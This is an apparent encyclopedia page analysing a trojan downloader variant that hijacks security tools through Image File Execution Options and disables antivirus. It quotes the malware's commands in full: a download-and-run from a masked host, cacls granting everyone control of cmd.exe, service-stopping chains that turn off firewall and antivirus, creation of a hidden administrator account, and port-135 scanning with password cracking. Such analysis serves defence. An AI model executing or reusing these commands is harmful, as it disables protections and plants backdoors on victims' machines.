王朝百科
分享
 
 
 

肉鸡猎人变种

王朝百科·作者佚名  2010-10-24  
宽屏版  字体: |||超大  

简介病毒名:Win32.Troj.Downloader.vb.81920

病毒类型:木马下载器

病毒长度:81920

影响系统:Win9x,WinMe,Linux

释放病毒文件:C:Por.aed

C:Documents and SettingsfishLocal SettingsTemporary Internet FilesContent.IE52PF3QNZECA05MZGT.htm[1]

行为分析这是一个木马下载器病毒。病毒为了隐藏自己,所取的病毒名描述信息都比较象系统正常信息。它除了会下载大量其它病毒外,还会严重破坏系统,关闭部分安全软件,映像劫持大量软件,并试图建立后门。[1]

描述

1.释放病毒文件

C:Por.aed

C:Documents and SettingsfishLocal SettingsTemporary Internet FilesContent.IE52PF3QNZECA05MZGT.htm

C:Documents and SettingsfishLocal SettingsTemporary Internet FilesContent.IE5C4DGV5NIgx[1].jpg

C:Documents and SettingsfishLocal SettingsTemporary Internet FilesContent.IE5R146ZVU7

otepde[1].jpg

C:Program Files360safesafemonsafemes.dll

C:WINDOWSSoundMan.exe

C:WINDOWSsystem32interne.exe

C:WINDOWSsystem32Man.exe

C:WINDOWSsystem32

o1.ini

C:WINDOWSsystem32

ote2.ini

C:WINDOWSsystem32

otepde.exe

C:WINDOWSsystem32qoq.exe

C:WINDOWSsystem32 tjj5.ini

2.创建服务并开启来加载文件,使其随系统启动

HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRunSoundMan SoundMan.exe

映像劫持大量程序,添加360Loader.exe 360Safe.exe 360tray.exe IceSword Iparmor.exe kmailmon.exe ras runiep

镜象劫持为"Debugger"="svchost.exe" 添加ctfmon.exe为"Debugger"="SoundMan.exe"

HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionImage File Execution Options360Loader.exe

HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionImage File Execution Options360Loader.exe Debugger "svchost.exe"

HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionImage File Execution Options360Safe.exe

HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionImage File Execution Options360Safe.exe Debugger "svchost.exe"

HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionImage File Execution Options360tray.exe

HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionImage File Execution Options360tray.exe Debugger "svchost.exe"

HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionImage File Execution Optionsctfmon.exe

HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionImage File Execution Optionsctfmon.exe Debugger "SoundMan.exe"

HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionImage File Execution OptionsIceSword

HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionImage File Execution OptionsIceSword Debugger "svchost.exe"

HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionImage File Execution OptionsIparmor.exe

HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionImage File Execution OptionsIparmor.exe Debugger "svchost.exe"

HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionImage File Execution Optionskmailmon.exe

HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionImage File Execution Optionskmailmon.exe Debugger "svchost.exe"

.

.

.

HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionImage File Execution Options

as

HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionImage File Execution Options

as Debugger "svchost.exe"

HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionImage File Execution Options

uniep

HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionImage File Execution Options

uniep Debugger "svchost.exe"

HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionImage File Execution Options askmgr.exe

HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionImage File Execution Options askmgr.exe Debugger "svchost.exe"

修改HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersion ExplorerAdvancedFolderHiddenSHOWALL不显示隐藏文件

删除安全软件的启动项

HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun

kav KavPFW vptray runeip RavTask RfwMain 360Loader.exe ras 360Safe.exe 360Safetray

3.病毒生成文件中的网址由解密字符串得到

CA05MZGT.htm

gx[1].jpg

notepde[1].jpg

4.枚举进程

判断当前进程里是否有"fint2005.exe" "ehsniffer.exe" "iris.exe" 嗅探工具,不管有无都等待10分钟,连接网络

InternetOpenUrlA读取InternetReadFile http://xxxxxxxx.com/rc/1500/gx[1].txt里面的列表,下载http://xxxxxx.com/rc/1500/gx[1].jpg

到c:windowssystem32vbb.exe运行

"cacls.exe C:WINDOWSsystem32cmd.exe /e /t /g everyone:F"给everyone用户组(就是所有人)对cmd.exe的完全控制,

cmd.exe /c net stop wscsvc&net stop sharedaccess&sc config sharedaccess start= disabled&sc config wscsvc

start= disabled&net stop KPfwSvc&net stop KWatchsvc&net stop McShield&net stop "Norton AntiVirus Server"

停止安全软件的服务。

5.搜索进程中是否含有kmailmon.exe kavstart.exe shstat.exe runiep.exe ras.exe MPG4C32.exe imsins.exe Iparmor.exe

360safe.exe 360tray.exe cacls.exe ccenter.exe 用TerminateProcess来结束

6."cmd.exe /c net user new1 12369 /add&

net user new1 12369&

net user new1 /active:yes&

net localgroup administrators /add

添加一个new1管理员帐号密码12369,将这些信息写入%windir%1.inf,然后调用rundll32.exe来修改Help and Support服务

C:WINDOWSsystem32interne.exe,并删除1.inf.关闭临时登陆用户new1

"HKLMSOFTWAREMicrosoftWindows NTCurrentVersionWinlogonSpecialAccountsUserList

ew1"添加建值为0,(1为开启)

不能创建删除用户"cmd.exe /c net user new1 /del"

7.访问"http://webipcha.cn/ip/ip.asp"获取当前外网IP,"cmd /c route print|find "Default Gateway: ">c:ip.txt"

获取网关地址到c:ip.txt,然后从文件重读出网关地址,删除文件。

8.判断当前进程有没有avp.exe 有了修改日期2001年7月15日

9.释放扫描器qoq.exe(Dotpot PortReady Ver1.6) 到%windir%/system32/下,扫描网关上下C段的所有135端口开放的主机,

记录到Por.aed,扫描外网C段上4个段位的ip ,"cmd.exe /c move "c:Por.aed" "%SystemRoot%system32Por.aed"&exit"

10.释放popo.exe到病毒运行当前目录读取Por.aed扫描出来的开135的IP地址 "cmd.exe /c start C:popo.exe ip &exit"

(如cmd.exe /c start C:popo.exe 192.1**.18.15 &exit 通过POPO.EXE进行扫字典密码破解)

11.扫描完毕删除qoq.exe, Por.aed, popo.exe[1]

 
 
免责声明:本文为网络用户发布,其观点仅代表作者个人观点,与本站无关,本站仅提供信息存储服务。文中陈述内容未经本站证实,其真实性、完整性、及时性本站不作任何保证或承诺,请读者仅作参考,并请自行核实相关内容。
如何用java替换看不见的字符比如零宽空格​十六进制U+200B
 干货   2023-09-10
网页字号不能单数吗,网页字体大小为什么一般都是偶数
 干货   2023-09-06
java.lang.ArrayIndexOutOfBoundsException: 4096
 干货   2023-09-06
Noto Sans CJK SC字体下载地址
 干货   2023-08-30
window.navigator和navigator的区别是什么?
 干货   2023-08-23
js获取referer、useragent、浏览器语言
 干货   2023-08-23
oscache遇到404时会不会缓存?
 干货   2023-08-23
linux下用rm -rf *删除大量文件太慢怎么解决?
 干货   2023-08-08
刀郎新歌破世界纪录!
 娱乐   2023-08-01
js实现放大缩小页面
 干货   2023-07-31
生成式人工智能服务管理暂行办法
 百态   2023-07-31
英语学习:过去完成时The Past Perfect Tense举例说明
 干货   2023-07-31
Mysql常用sql命令语句整理
 干货   2023-07-30
科学家复活了46000年前的虫子
 探索   2023-07-29
英语学习:过去进行时The Past Continuous Tense举例说明
 干货   2023-07-28
meta name="applicable-device"告知页面适合哪种终端设备:PC端、移动端还是自适应
 干货   2023-07-28
只用css如何实现打字机特效?
 百态   2023-07-15
css怎么实现上下滚动
 干货   2023-06-28
canvas怎么画一个三角形?
 干货   2023-06-28
canvas怎么画一个椭圆形?
 干货   2023-06-28
canvas怎么画一个圆形?
 干货   2023-06-28
canvas怎么画一个正方形?
 干货   2023-06-28
中国河南省郑州市金水区蜘蛛爬虫ip大全
 干货   2023-06-22
javascript简易动态时间代码
 干货   2023-06-20
感谢员工的付出和激励的话怎么说?
 干货   2023-06-18
 
>>返回首页<<
 
 
静静地坐在废墟上,四周的荒凉一望无际,忽然觉得,凄凉也很美
© 2005- 王朝网络 版权所有